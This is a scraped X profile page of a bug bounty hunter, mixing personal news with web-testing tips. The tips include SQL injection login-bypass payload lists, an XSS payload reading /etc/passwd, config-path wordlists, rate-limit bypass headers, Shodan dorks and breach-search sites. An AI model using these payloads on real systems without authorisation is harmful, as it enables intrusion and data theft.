Aditya (@ADITYASHENDE17) / X

Aditya

12.4K posts

Aditya

@ADITYASHENDE17

Planet Earth

kongsec.io

Born July 20

Joined April 2019

Pinned
Aditya
@ADITYASHENDE17
Mar 5, 2020
2000 points @Bugcrowd Good bounties & Good life
Aditya
@ADITYASHENDE17
Jan 30, 2021
Happy to tell you. Got offer letter from cambridge campus university ARU , UK. Masters in cyber security + offensive security. I am travelling to UK after 6 months. So if there is physical meetup like nullcon, owasp meets etc . Will meet ❤️❤️❤️
Aditya
@ADITYASHENDE17
Dec 14, 2020
Data breach search engines intelx.io leakcheck.net snusbase.com haveibeenpwned.com leakpeek.com breachchecker.com leak-lookup.com weleakinfo.to leakcheck.io
Aditya
@ADITYASHENDE17
Nov 21, 2020
Burpsuite extension to bypass 403 restricted directory. Installation BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh. github.com/sting8k/BurpSu…
Aditya
@ADITYASHENDE17
Apr 19, 2020
or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'--
Aditya
@ADITYASHENDE17
Jan 12, 2023
Few dorks which I use to find common bugs while testing. Add your so it’ll help others ssl.cert.subject.CN:"*.target. com" http.title:"index of/" ssl.cert.subject.CN:"*.target. com" http.title:"gitlab" ssl.cert.subject.CN:"*.wur.nl" http.title:"gitlab"
72K
Aditya
@ADITYASHENDE17
Aug 27, 2020
/api/v1/account/accounts /api/v1/account/accounts/summaries /api/v1/account/oauth/token /api/v1/account/oauth/ticket /api/v1/account/permissions /api/v1/account/user /api/v1/account/user/assets /api/v1/account/user/delete /api/v1/account/user/profile
Aditya
@ADITYASHENDE17
Jun 27, 2022
Payload: <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/> Reference: blog.dixitaditya.com/xss-to-read-in…
Aditya
@ADITYASHENDE17
Aug 28, 2020
/.config.php /.git/config ////../../data/config/microsrv.cfg //admin/config.php /admin/config.php /administrator/webconfig.txt.php /app.config /audit.config /Cassini.exe.config /ccnet.config /cgi-bin/config.exp /conceptual.config /config /config.inc /config.inc.php
Aditya
@ADITYASHENDE17
Jun 20, 2020
Rate Limiting Bypass IP Rotation --> Sending new ip's Null byte -- %00,%0d%0a,%09 exapmple:email:[email protected]%00 4. X-Forwarded-For: IP ex:X-Forwarded-For: 127.0.0.1 5. Double X forward option ex: X-Forwarded-For: X-Forwarded-For:127.0.0.1
Aditya
@ADITYASHENDE17
Jan 12, 2021
Finally my 3rd beast is here❤️❤️
Aditya
@ADITYASHENDE17
Mar 14, 2020
Payloads para sql inyection login bypass ' or ''-' " or ""-" " or true-- ' or true-- admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* #payloads #payload #Bypass
Aditya
@ADITYASHENDE17
Sep 15, 2020
Finally 🏠 construction completed with help of big bounties, investment, stock trade. And obviously farming 😍😍
Aditya
@ADITYASHENDE17
Apr 3, 2020
SAML Security Testing Tutorial: 1 - epi052.gitlab.io/notes-to-self/… 2 - epi052.gitlab.io/notes-to-self/… 3 - epi052.gitlab.io/notes-to-self/… Surface: github.com/kelbyludwig/sa… Examples: - secretsofappsecurity.blogspot.com/2017/01/saml-s… - seanmelia.wordpress.com/2016/01/09/xxe… - hackerone.com/reports/136169 #kongsec
epi052.gitlab.io
How to Hunt Bugs in SAML; a Methodology - Part I | epi's notes-to-self
The first in a series of three posts about a methodology for hunting bugs in SAML. This post covers background information about SAML, laying the groundwork to understand SAML vulnerabilities and...